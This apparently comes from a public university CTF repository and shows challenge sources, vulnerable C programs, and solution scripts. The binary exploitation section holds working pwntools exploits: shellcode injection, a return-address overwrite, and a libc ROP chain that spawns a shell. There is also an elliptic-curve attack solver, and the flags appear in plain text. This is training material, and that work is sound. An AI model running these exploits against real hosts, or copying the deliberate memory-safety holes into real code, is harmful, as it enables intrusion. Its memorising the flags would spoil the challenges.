├── .gitattributes ├── .gitignore ├── Binary Exploitation ├── baby-shellcode │ ├── README.md │ ├── chal │ │ └── baby-shellcode │ ├── solve │ │ ├── README.md │ │ ├── flag │ │ └── ntr.py │ └── src │ │ ├── baby-shellcode.asm │ │ └── makefile ├── basic-overflow │ ├── README.md │ ├── chal │ │ └── basic-overflow │ ├── solve │ │ ├── README.md │ │ ├── basic-overflow │ │ ├── flag │ │ └── ntr.py │ └── src │ │ ├── basic-overflow.c │ │ └── makefile ├── nothing-to-return │ ├── README.md │ ├── chal │ │ ├── ld-linux-x86-64.so.2 │ │ ├── libc.so.6 │ │ └── nothing-to-return │ ├── solve │ │ ├── README.md │ │ ├── flag │ │ └── ntr.py │ └── src │ │ ├── libc_gadgets.txt │ │ ├── makefile │ │ └── nothing-to-return.c └── patched-shell │ ├── README.md │ ├── chal │ └── patched-shell │ ├── solve │ ├── README.md │ ├── flag │ └── ntr.py │ └── src │ ├── makefile │ └── patched-shell.c ├── Cryptography ├── clever-thinking │ ├── README.md │ ├── chal │ │ └── chal.sage │ └── solve │ │ ├── solve.md │ │ └── solve.sage ├── export-grade-cipher │ ├── Dockerfile │ ├── ctf.xinetd │ ├── solve │ │ ├── soln.py │ │ └── soln_remote.py │ └── src │ │ ├── chal.py │ │ ├── exportcipher.py │ │ ├── flag.py │ │ └── start.sh ├── pianoman │ ├── README.md │ ├── chal │ │ ├── music_cipher.py │ │ ├── musical_e.png │ │ └── output.txt │ └── src │ │ ├── gen.py │ │ ├── output.txt │ │ └── solve.py ├── repeat │ ├── README.md │ ├── chal │ │ ├── flag.enc │ │ └── gen.py │ └── src │ │ ├── flag.enc │ │ ├── gen.py │ │ └── solve.py └── wheel-barrow │ ├── README.md │ ├── chal │ └── transformed.txt │ └── src │ └── solve.md ├── Forensics ├── EnableMe │ ├── README.md │ ├── chal │ │ └── invoice.docm │ ├── solve │ │ ├── flag │ │ └── solve.py │ └── src │ │ └── macro.vba ├── Hourglass │ ├── README.md │ ├── chal │ │ └── info.txt │ ├── command.png │ └── solve │ │ ├── README.md │ │ ├── init.png │ │ └── tasks.png ├── Illusion │ ├── README.md │ └── traffic.pcapng ├── NoGrep │ ├── README.md │ ├── decode.png │ └── path.png ├── Secret Message 2 │ ├── chal │ │ └── redacted.png │ └── solve │ │ ├── cropped.png │ │ ├── flag │ │ ├── output.png │ │ └── writeup.md └── Secret Message │ ├── chal │ └── secret.pdf │ ├── solve │ ├── flag │ └── writeup.md │ └── src │ └── gen.py ├── IoT └── babys_first_iot │ ├── LICENSE │ ├── README.md │ ├── remote_chal │ ├── Challenge4 │ │ └── printenv │ ├── Challenge6 │ │ └── Challenge6.7z │ ├── Challenge7 │ │ └── firmware2.bin │ ├── Challenge8_9 │ │ ├── .flag9 │ │ │ └── .flag9 │ │ ├── Binary │ │ ├── File │ │ │ └── Binary │ │ └── flag8 │ ├── StartHackNight.sh │ ├── Submit_Chall1_answer │ │ └── Challenge1 │ ├── Submit_Chall2_answer │ │ └── Challenge2 │ ├── Submit_Chall5_answer │ │ └── Challenge5 │ ├── Submit_Chall6_answer │ │ └── Challenge6 │ └── Submit_Chall7_answer │ │ └── Challenge7 │ ├── solve │ └── solve.md │ └── src │ ├── Binary.c │ ├── Challenge1 │ ├── Challenge1.c │ ├── Challenge2.c │ ├── Challenge5.c │ ├── Challenge6.c │ └── Challenge7.c ├── Jail ├── baby_js_blacklist │ ├── README.md │ ├── chal │ │ ├── Dockerfile │ │ ├── chal.js │ │ ├── package.json │ │ └── run │ └── solve │ │ ├── flag │ │ └── writeup.md ├── babys_first_pyjail │ ├── README.md │ ├── solve │ │ └── writeup.md │ └── src │ │ ├── Dockerfile │ │ ├── chal.py │ │ └── run ├── js_blacklist │ ├── README.md │ ├── chal │ │ ├── Dockerfile │ │ ├── chal.js │ │ ├── package.json │ │ └── run │ └── solve │ │ ├── flag │ │ ├── payload.txt │ │ └── writeup.md ├── js_evaluator │ ├── README.md │ ├── chal │ │ ├── Dockerfile │ │ ├── chal.js │ │ ├── evaluation_patched.js │ │ ├── package.json │ │ └── run │ └── solve │ │ ├── flag │ │ └── writeup.md └── zero │ ├── README.md │ ├── chal │ ├── Dockerfile │ ├── chal.py │ └── run │ └── solve │ ├── flag │ └── writeup.md ├── Miscellaneous ├── Out of the Bucket 2 │ ├── solve │ │ └── solve.md │ └── src │ │ ├── 256x192 │ │ ├── ad.png │ │ ├── ae.png │ │ ├── af.png │ │ ├── ag.png │ │ ├── ai.png │ │ ├── al.png │ │ ├── am.png │ │ ├── ao.png │ │ ├── aq.png │ │ ├── ar.png │ │ ├── as.png │ │ ├── at.png │ │ ├── au.png │ │ ├── aw.png │ │ ├── ax.png │ │ ├── az.png │ │ ├── ba.png │ │ ├── bb.png │ │ ├── bd.png │ │ ├── be.png │ │ ├── bf.png │ │ ├── bg.png │ │ ├── bh.png │ │ ├── bi.png │ │ ├── bj.png │ │ ├── bl.png │ │ ├── bm.png │ │ ├── bn.png │ │ ├── bo.png │ │ ├── bq.png │ │ ├── br.png │ │ ├── bs.png │ │ ├── bt.png │ │ ├── bv.png │ │ ├── bw.png │ │ ├── by.png │ │ ├── bz.png │ │ ├── ca.png │ │ ├── cc.png │ │ ├── cd.png │ │ ├── cf.png │ │ ├── cg.png │ │ ├── ch.png │ │ ├── ci.png │ │ ├── ck.png │ │ ├── cl.png │ │ ├── cm.png │ │ ├── cn.png │ │ ├── co.png │ │ ├── cr.png │ │ ├── cu.png │ │ ├── cv.png │ │ ├── cw.png │ │ ├── cx.png │ │ ├── cy.png │ │ ├── cz.png │ │ ├── de.png │ │ ├── dj.png │ │ ├── dk.png │ │ ├── dm.png │ │ ├── do.png │ │ ├── dz.png │ │ ├── ec.png │ │ ├── ee.png │ │ ├── eg.png │ │ ├── eh.png │ │ ├── er.png │ │ ├── es.png │ │ ├── et.png │ │ ├── fi.png │ │ ├── fj.png │ │ ├── fk.png │ │ ├── fm.png │ │ ├── fo.png │ │ ├── fr.png │ │ ├── ga.png │ │ ├── gb-eng.png │ │ ├── gb-nir.png │ │ ├── gb-sct.png │ │ ├── gb-wls.png │ │ ├── gb.png │ │ ├── gd.png │ │ ├── ge.png │ │ ├── gf.png │ │ ├── gg.png │ │ ├── gh.png │ │ ├── gi.png │ │ ├── gl.png │ │ ├── gm.png │ │ ├── gn.png │ │ ├── gp.png │ │ ├── gq.png │ │ ├── gr.png │ │ ├── gs.png │ │ ├── gt.png │ │ ├── gu.png │ │ ├── gw.png │ │ ├── gy.png │ │ ├── hk.png │ │ ├── hm.png │ │ ├── hn.png │ │ ├── hr.png │ │ ├── ht.png │ │ ├── hu.png │ │ ├── id.png │ │ ├── ie.png │ │ ├── il.png │ │ ├── im.png │ │ ├── in.png │ │ ├── io.png │ │ ├── iq.png │ │ ├── ir.png │ │ ├── is.png │ │ ├── it.png │ │ ├── je.png │ │ ├── jm.png │ │ ├── jo.png │ │ ├── jp.png │ │ ├── ke.png │ │ ├── kg.png │ │ ├── kh.png │ │ ├── ki.png │ │ ├── km.png │ │ ├── kn.png │ │ ├── kp.png │ │ ├── kr.png │ │ ├── kw.png │ │ ├── ky.png │ │ ├── kz.png │ │ ├── la.png │ │ ├── lb.png │ │ ├── lc.png │ │ ├── li.png │ │ ├── lk.png │ │ ├── lr.png │ │ ├── ls.png │ │ ├── lt.png │ │ ├── lu.png │ │ ├── lv.png │ │ ├── ly.png │ │ ├── ma.png │ │ ├── mc.png │ │ ├── md.png │ │ ├── me.png │ │ ├── mf.png │ │ ├── mg.png │ │ ├── mh.png │ │ ├── mk.png │ │ ├── ml.png │ │ ├── mm.png │ │ ├── mn.png │ │ ├── mo.png │ │ ├── mp.png │ │ ├── mq.png │ │ ├── mr.png │ │ ├── ms.png │ │ ├── mt.png │ │ ├── mu.png │ │ ├── mv.png │ │ ├── mw.png │ │ ├── mx.png │ │ ├── my.png │ │ ├── mz.png │ │ ├── na.png │ │ ├── nc.png │ │ ├── ne.png │ │ ├── nf.png │ │ ├── ng.png │ │ ├── ni.png │ │ ├── nl.png │ │ ├── no.png │ │ ├── np.png │ │ ├── nr.png │ │ ├── nu.png │ │ ├── nz.png │ │ ├── om.png │ │ ├── pa.png │ │ ├── pe.png │ │ ├── pf.png │ │ ├── pg.png │ │ ├── ph.png │ │ ├── pk.png │ │ ├── pl.png │ │ ├── pm.png │ │ ├── pn.png │ │ ├── pr.png │ │ ├── ps.png │ │ ├── pt.png │ │ ├── pw.png │ │ ├── py.png │ │ ├── qa.png │ │ ├── re.png │ │ ├── ro.png │ │ ├── rs.png │ │ ├── ru.png │ │ ├── rw.png │ │ ├── sa.png │ │ ├── sb.png │ │ ├── sc.png │ │ ├── sd.png │ │ ├── se.png │ │ ├── sg.png │ │ ├── sh.png │ │ ├── si.png │ │ ├── sj.png │ │ ├── sk.png │ │ ├── sl.png │ │ ├── sm.png │ │ ├── sn.png │ │ ├── so.png │ │ ├── sr.png │ │ ├── ss.png │ │ ├── st.png │ │ ├── sv.png │ │ ├── sx.png │ │ ├── sy.png │ │ ├── sz.png │ │ ├── tc.png │ │ ├── td.png │ │ ├── tf.png │ │ ├── tg.png │ │ ├── th.png │ │ ├── tj.png │ │ ├── tk.png │ │ ├── tl.png │ │ ├── tm.png │ │ ├── tn.png │ │ ├── to.png │ │ ├── tr.png │ │ ├── tt.png │ │ ├── tv.png │ │ ├── tw.png │ │ ├── tz.png │ │ ├── ua.png │ │ ├── ug.png │ │ ├── um.png │ │ ├── us.png │ │ ├── uy.png │ │ ├── uz.png │ │ ├── va.png │ │ ├── vc.png │ │ ├── ve.png │ │ ├── vg.png │ │ ├── vi.png │ │ ├── vn.png │ │ ├── vu.png │ │ ├── wf.png │ │ ├── ws.png │ │ ├── xa.png │ │ ├── xk.png │ │ ├── ye.png │ │ ├── yt.png │ │ ├── za.png │ │ ├── zm.png │ │ └── zw.png │ │ └── flag ├── Out of the Bucket │ ├── chal │ │ ├── secret │ │ │ ├── dont_show │ │ │ └── funny.json │ │ └── src │ │ │ ├── index.html │ │ │ └── static │ │ │ ├── antwerp.jpg │ │ │ ├── guam.jpg │ │ │ └── style.css │ └── solve │ │ └── solve.md ├── Prediction API │ ├── README.md │ ├── solve │ │ ├── flag │ │ ├── solve.ipynb │ │ └── solve.md │ └── src │ │ ├── app.py │ │ ├── mnist.npz │ │ ├── model.h5 │ │ ├── model.py │ │ ├── requirements.txt │ │ └── templates │ │ └── index.html └── Source Code Recovery │ ├── README.md │ ├── chal │ └── chal.py │ ├── remote_chal │ ├── docker-compose.yml │ ├── exec_jail │ │ ├── Dockerfile │ │ ├── exec_jail.py │ │ └── run │ ├── flag_server │ │ ├── Dockerfile │ │ ├── flag.py │ │ └── flag_server.py │ └── setup.sh │ └── solve │ └── soln.c ├── OSINT └── Flying High │ ├── README.md │ ├── chal │ └── airplane.png │ └── solve │ ├── flag.txt │ └── solve.md ├── README.md ├── Reverse Engineering ├── AllWorbledUp │ ├── chal │ │ └── worbler │ ├── readme.md │ └── solve │ │ ├── makedis.py │ │ ├── soln.md │ │ ├── soln.py │ │ └── worbler.py ├── CEOs Lost Password │ ├── chal │ │ └── BankChallenge.jar │ ├── readme.md │ ├── solve │ │ ├── Solution.java │ │ ├── flag │ │ └── readme.md │ └── src │ │ └── Main.java ├── CSS Password │ ├── README.md │ ├── chal │ │ └── css-password.html │ └── solve │ │ ├── solve.js │ │ └── solve.md ├── RandomMaze │ ├── chal │ │ ├── maze │ │ └── soln.md │ ├── readme.md │ └── solve │ │ ├── maze.c │ │ ├── nodes.c │ │ ├── nodes.h │ │ └── soln.c └── love-debug │ ├── chal │ └── love-letter-for-you │ ├── solve │ ├── result.bin │ ├── result2.bin │ └── solution.md │ └── src │ ├── README.md │ ├── alacritty.bf │ ├── love-letter-for-you.bf │ ├── vscode.bf │ └── windows-terminal.bf └── Web ├── Guestbook ├── README.md ├── chal │ └── index.html └── solve │ ├── README.md │ ├── flag │ └── src │ └── appscript.js ├── Jay's Bank ├── README.md ├── chal │ ├── Dockerfile │ ├── config │ │ └── init.sql │ ├── docker-compose.yml │ ├── index.js │ ├── middleware │ │ └── authMiddleware.js │ ├── package.json │ ├── routes │ │ └── index.js │ ├── static │ │ ├── css │ │ │ ├── dashboard.css │ │ │ ├── login.css │ │ │ ├── main.css │ │ │ ├── profile.css │ │ │ └── register.css │ │ └── js │ │ │ ├── login.js │ │ │ ├── profile.js │ │ │ └── register.js │ ├── utils │ │ ├── config.js │ │ └── db.js │ └── views │ │ ├── dashboard.ejs │ │ ├── index.ejs │ │ ├── login.ejs │ │ ├── profile.ejs │ │ └── register.ejs └── solve │ ├── flag │ └── solve.py ├── My First App ├── README.md ├── solve │ ├── arg_err.png │ ├── ascii_err.png │ ├── first_err.png │ └── writeup.md └── src │ ├── .gitignore │ ├── Dockerfile │ ├── app.py │ ├── flag.txt │ ├── requirements.txt │ ├── routes.py │ ├── static │ └── style.css │ ├── templates │ ├── layout.html │ └── register.html │ └── utils.py ├── No Code ├── README.md ├── solve │ └── solve.py └── src │ ├── Dockerfile │ ├── app.py │ ├── flag.txt │ └── requirements.txt ├── The Varsity ├── README.md ├── chal │ ├── Dockerfile │ ├── package.json │ ├── server.js │ ├── static │ │ ├── css │ │ │ ├── index.css │ │ │ └── register.css │ │ └── js │ │ │ ├── index.js │ │ │ └── register.js │ └── views │ │ ├── register.ejs │ │ └── user.ejs └── solve │ ├── flag │ └── solve.py └── Voice Changer ├── README.md ├── chal ├── Dockerfile ├── secret.txt └── src │ ├── index.js │ ├── package.json │ ├── public │ └── index.html │ └── yarn.lock └── solve ├── README.md ├── flag └── img.png /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | package-lock.json 3 | node_modules -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/README.md: -------------------------------------------------------------------------------- 1 | # Baby Shellcode 2 | 3 | This challenge is a test to see if you know 4 | how to write programs that machines can understand. 5 | 6 | Oh, you know how to code? 7 | 8 | Write some code into this program, 9 | and the program will run it for you. 10 | 11 | What programming language, you ask? 12 | Well... I said it's the language that *machines* can understand. 13 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/chal/baby-shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/baby-shellcode/chal/baby-shellcode -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/solve/README.md: -------------------------------------------------------------------------------- 1 | # Baby Shellcode 2 | 3 | For the uninitiated, shellcode is a piece of code that spawns a shell. This is usually used in exploits to spawn a shell on a remote machine. 4 | 5 | A shellcode is usually written in assembly and is usually very small in size. Then it is converted to machine code and is injected into the program. 6 | 7 | So there's nothing too interesting here, just write a simple shellcode that spawns a shell. 8 | 9 | Or you can find a shellcode online and use that. 10 | 11 | Once you have the shellcode, pass it as input to the program, 12 | and it will spawn a shell for you. 13 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{arbitrary_machine_code_execution} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # https://shell-storm.org/shellcode/files/shellcode-806.html 4 | payload = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 5 | 6 | elf = ELF("../chal/baby-shellcode") 7 | 8 | if args.REMOTE: 9 | # io = remote("localhost", 5000) 10 | io = remote("34.28.147.7", 5000) 11 | else: 12 | io = elf.process() 13 | 14 | io.send(payload) 15 | io.interactive() 16 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/src/baby-shellcode.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | section .text 3 | 4 | _start: 5 | sub rsp, 0x400 6 | mov rdx, 0x400 7 | mov rsi, rsp 8 | mov rdi, 0x0 9 | mov rax, 0x0 10 | syscall 11 | jmp rsp 12 | -------------------------------------------------------------------------------- /Binary Exploitation/baby-shellcode/src/makefile: -------------------------------------------------------------------------------- 1 | all: baby-shellcode 2 | 3 | baby-shellcode: baby-shellcode.o 4 | ld -z execstack -o baby-shellcode baby-shellcode.o 5 | 6 | baby-shellcode.o: baby-shellcode.asm 7 | nasm -felf64 baby-shellcode.asm 8 | 9 | clean: 10 | rm baby-shellcode.o 11 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/README.md: -------------------------------------------------------------------------------- 1 | # Basic Overflow 2 | 3 | This challenge is simple. 4 | 5 | It just gets input, stores it to a buffer. 6 | 7 | It calls `gets` to read input, stores the read bytes to a buffer, then exits. 8 | 9 | What is `gets`, you ask? Well, it's time you read the manual, no? 10 | 11 | `man 3 gets` 12 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/chal/basic-overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/basic-overflow/chal/basic-overflow -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/solve/basic-overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/basic-overflow/solve/basic-overflow -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{reading_manuals_is_very_fun} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF("../chal/basic-overflow") 4 | 5 | # if you run `python ntr.py REMOTE` it will connect to the remote server 6 | if args.REMOTE: 7 | # nc 34.123.15.202 5000 8 | io = remote("34.123.15.202", 5000) 9 | else: 10 | io = elf.process() 11 | 12 | # pwntools can automatically find the offset for us! 13 | io.sendline(b'A' * 0x48 + p64(elf.sym['shell'])) 14 | 15 | # drop to interactive so we can interact with the shell 16 | io.interactive() 17 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/src/basic-overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void shell() { 5 | execve("/bin/sh", NULL, NULL); 6 | } 7 | 8 | int main() { 9 | char buffer[64]; 10 | gets(buffer); 11 | } 12 | -------------------------------------------------------------------------------- /Binary Exploitation/basic-overflow/src/makefile: -------------------------------------------------------------------------------- 1 | CFLAGS := -O0 -fno-stack-protector -no-pie 2 | 3 | basic-overflow: basic-overflow.c 4 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/README.md: -------------------------------------------------------------------------------- 1 | # Nothing to Return 2 | 3 | Now this challenge has a binary of a very small size. 4 | 5 | "The binary has no useful gadgets! There is just nothing to return to!" 6 | 7 | nice try... ntr 8 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/chal/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/nothing-to-return/chal/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/chal/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/nothing-to-return/chal/libc.so.6 -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/chal/nothing-to-return: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/nothing-to-return/chal/nothing-to-return -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{libc_is_abundant_of_gadgets} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF( "../chal/nothing-to-return") 4 | libc = ELF("../chal/libc.so.6") 5 | 6 | if args.REMOTE: 7 | io = remote('34.30.126.104', 5000) 8 | else: 9 | io = elf.process() 10 | pause() 11 | 12 | io.recvuntil(b'printf is at 0x') 13 | # in pwntools, you can rebase ELF object like this 14 | libc.address = int(io.recvline(), 16) - libc.sym['printf'] 15 | 16 | # you can also use the ROP module of pwntools, but I prefer to use raw ROP chain 17 | pop_rdi = libc.address + 0x0000000000028265 # : pop rdi ; ret 18 | ret = libc.address + 0x000000000002648d # : ret 19 | 20 | rop_chain = [ 21 | pop_rdi, 22 | # you can search the string in libc like this using pwntools 23 | next(libc.search(b'/bin/sh\x00')), 24 | ret, 25 | libc.sym['system'] 26 | ] 27 | 28 | payload = b'A' * 0x48 + b''.join(map(p64, rop_chain)) 29 | 30 | io.recvuntil(b'size:\n') 31 | io.sendline(str(len(payload)).encode('ascii')) 32 | 33 | io.recvuntil(b'input:\n') 34 | io.send(payload) 35 | 36 | io.interactive() 37 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/src/makefile: -------------------------------------------------------------------------------- 1 | CFLAGS := -O0 -fno-stack-protector -no-pie 2 | 3 | nothing-to-return: nothing-to-return.c libc.so.6 ld-linux-x86-64.so.2 4 | $(CC) $(CFLAGS) nothing-to-return.c -o nothing-to-return 5 | pwninit --bin nothing-to-return --ld ld-linux-x86-64.so.2 --libc libc.so.6 6 | mv nothing-to-return_patched nothing-to-return 7 | rm solve.py 8 | ROPgadget --binary nothing-to-return > ropgadgets.txt 9 | -------------------------------------------------------------------------------- /Binary Exploitation/nothing-to-return/src/nothing-to-return.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void get_input(char *dst) { 6 | size_t input_size; 7 | char *input_buffer; 8 | 9 | puts("Input size:"); 10 | 11 | scanf("%lu[^\n]", &input_size); 12 | 13 | input_buffer = (char *)calloc(1, input_size); 14 | 15 | // hack that reads till the newline 16 | fgets(input_buffer, input_size, stdin); 17 | 18 | puts("Enter your input:"); 19 | fgets(input_buffer, input_size, stdin); 20 | 21 | memcpy(dst, input_buffer, input_size); 22 | free(input_buffer); 23 | } 24 | 25 | int main() { 26 | printf("printf is at %p\n", printf); 27 | 28 | char buffer[64]; 29 | 30 | puts("Hello give me an input"); 31 | get_input(buffer); 32 | 33 | puts("I'm returning the input:"); 34 | puts(buffer); 35 | 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/README.md: -------------------------------------------------------------------------------- 1 | # Patched Shell 2 | 3 | Okay, okay. So you were smart enough to do basic overflow huh... 4 | 5 | Now try this challenge! 6 | I patched the shell function so it calls system instead of execve... 7 | so now your exploit shouldn't work! bwahahahahaha 8 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/chal/patched-shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Binary Exploitation/patched-shell/chal/patched-shell -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/solve/README.md: -------------------------------------------------------------------------------- 1 | # Patched-Shell 2 | 3 | This is just the continuation of basic-overflow. 4 | 5 | Just like in basic-overflow, the buffer is the same size, but this time, `shell` calls `system` instead of `execve`. 6 | 7 | There exists an issue with `system` that `execve` doesn't have. 8 | When we call `system`, it requires that the stack is aligned to 16 bytes. 9 | This stack alignment requirement exists in most 10 | amd64 Linux systems, and it allows for SSE instructions to be used. 11 | 12 | So how do we align the stack to 16 bytes? We can just make `main` return twice, effectively aligning the stack. 13 | 14 | ``` 15 | [ 0x40 bytes of buffer ][ old rbp ][ ret addr = ret instruction of main ][ ret addr = shell() ] 16 | ``` 17 | 18 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{patched_the_wrong_function} 2 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/solve/ntr.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF("../chal/patched-shell") 4 | 5 | if args.REMOTE: 6 | io = remote("34.134.173.142", 5000) 7 | else: 8 | io = elf.process() 9 | 10 | # this is ret instruction of main 11 | main_ret = p64(0x40116b) 12 | 13 | io.sendline(b'A' * 0x48 + main_ret + p64(elf.sym['shell'])) 14 | 15 | io.interactive() 16 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/src/makefile: -------------------------------------------------------------------------------- 1 | CFLAGS := -O0 -fno-stack-protector -no-pie 2 | 3 | patched-shell: patched-shell.c 4 | -------------------------------------------------------------------------------- /Binary Exploitation/patched-shell/src/patched-shell.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void shell() { 5 | system("/bin/sh"); 6 | } 7 | 8 | int main() { 9 | char buffer[64]; 10 | gets(buffer); 11 | } 12 | -------------------------------------------------------------------------------- /Cryptography/clever-thinking/README.md: -------------------------------------------------------------------------------- 1 | # clever thinking 2 | 3 | I think that Diffie-Hellman is better with some curves, maybe elliptic ones. Let's share a secret! 4 | 5 | Wrap the secret (which is a point) in `uoftctf{(x:y:z)}`, where `(x:y:z)` are homogeneous coordinates. -------------------------------------------------------------------------------- /Cryptography/clever-thinking/chal/chal.sage: -------------------------------------------------------------------------------- 1 | m = 235322474717419 2 | F = GF(m) 3 | C = EllipticCurve(F, [0, 8856682]) 4 | 5 | public_base = (185328074730054:87402695517612:1) 6 | 7 | Q1 = (184640716867876:45877854358580:1) # my public key 8 | Q2 = (157967230203538:128158547239620:1) # your public key 9 | 10 | secret = ... 11 | my_private_key = ... 12 | assert(my_private_key*public_base == Q1) 13 | assert(my_private_key*Q2 == secret) 14 | -------------------------------------------------------------------------------- /Cryptography/clever-thinking/solve/solve.md: -------------------------------------------------------------------------------- 1 | The flag is `uoftctf{(11278025017971:36226806176053:1)}`. -------------------------------------------------------------------------------- /Cryptography/clever-thinking/solve/solve.sage: -------------------------------------------------------------------------------- 1 | def SmartAttack(P,Q,p): 2 | E = P.curve() 3 | Eqp = EllipticCurve(Qp(p, 2), [ ZZ(t) + randint(0,p)*p for t in E.a_invariants() ]) 4 | 5 | P_Qps = Eqp.lift_x(ZZ(P.xy()[0]), all=True) 6 | for P_Qp in P_Qps: 7 | if GF(p)(P_Qp.xy()[1]) == P.xy()[1]: 8 | break 9 | 10 | Q_Qps = Eqp.lift_x(ZZ(Q.xy()[0]), all=True) 11 | for Q_Qp in Q_Qps: 12 | if GF(p)(Q_Qp.xy()[1]) == Q.xy()[1]: 13 | break 14 | 15 | p_times_P = p*P_Qp 16 | p_times_Q = p*Q_Qp 17 | 18 | x_P,y_P = p_times_P.xy() 19 | x_Q,y_Q = p_times_Q.xy() 20 | 21 | phi_P = -(x_P/y_P) 22 | phi_Q = -(x_Q/y_Q) 23 | k = phi_Q/phi_P 24 | return ZZ(k) 25 | 26 | 27 | m = 235322474717419 28 | F = GF(m) 29 | C = EllipticCurve(F, [0, 8856682]) 30 | 31 | public_base = C(185328074730054, 87402695517612) 32 | 33 | Q1 = C(184640716867876, 45877854358580) # my public key 34 | Q2 = C(157967230203538, 128158547239620) # your public key 35 | 36 | 37 | my_private_key = SmartAttack(public_base, Q1, 235322474717419) # 127556068971283 38 | your_private_key = SmartAttack(public_base, Q2, 235322474717419) # 76918112227635 39 | 40 | secret = my_private_key*Q2 # or your_private_key*Q1 41 | 42 | -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.11-slim 2 | 3 | RUN apt-get update && apt-get install -y \ 4 | xinetd \ 5 | && rm -rf /var/lib/apt/lists/* 6 | 7 | RUN mkdir /ctf 8 | WORKDIR /ctf 9 | RUN useradd -M -d /ctf ctf 10 | 11 | RUN echo "Connection blocked" > /etc/banner_fail 12 | COPY ctf.xinetd /etc/xinetd.d/ctf 13 | COPY ./src /ctf/ 14 | 15 | RUN chown -R root:ctf /ctf && \ 16 | chmod -R 750 /ctf 17 | 18 | ENTRYPOINT [] 19 | CMD ["/usr/sbin/xinetd", "-dontfork"] 20 | 21 | EXPOSE 8000 -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/ctf.xinetd: -------------------------------------------------------------------------------- 1 | service ctf 2 | { 3 | disable = no 4 | socket_type = stream 5 | protocol = tcp 6 | wait = no 7 | user = ctf 8 | type = UNLISTED 9 | port = 8000 10 | bind = 0.0.0.0 11 | server = /bin/sh 12 | server_args = /ctf/start.sh 13 | banner_fail = /etc/banner_fail 14 | # safety options 15 | per_source = 10 # the maximum instances of this service per source IP address 16 | rlimit_cpu = 1 # the maximum number of CPU seconds that the service may use 17 | #rlimit_as = 1024M # the Address Space resource limit for the service 18 | } -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/src/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = "uoftctf{wH0_w0u1D_h4ve_7houGHt_l0ng_nONceS_CAnt_S4ve_w3ak_KeYS}" -------------------------------------------------------------------------------- /Cryptography/export-grade-cipher/src/start.sh: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | 3 | cd /ctf 4 | /usr/local/bin/python chal.py -------------------------------------------------------------------------------- /Cryptography/pianoman/README.md: -------------------------------------------------------------------------------- 1 | # pianoman 2 | 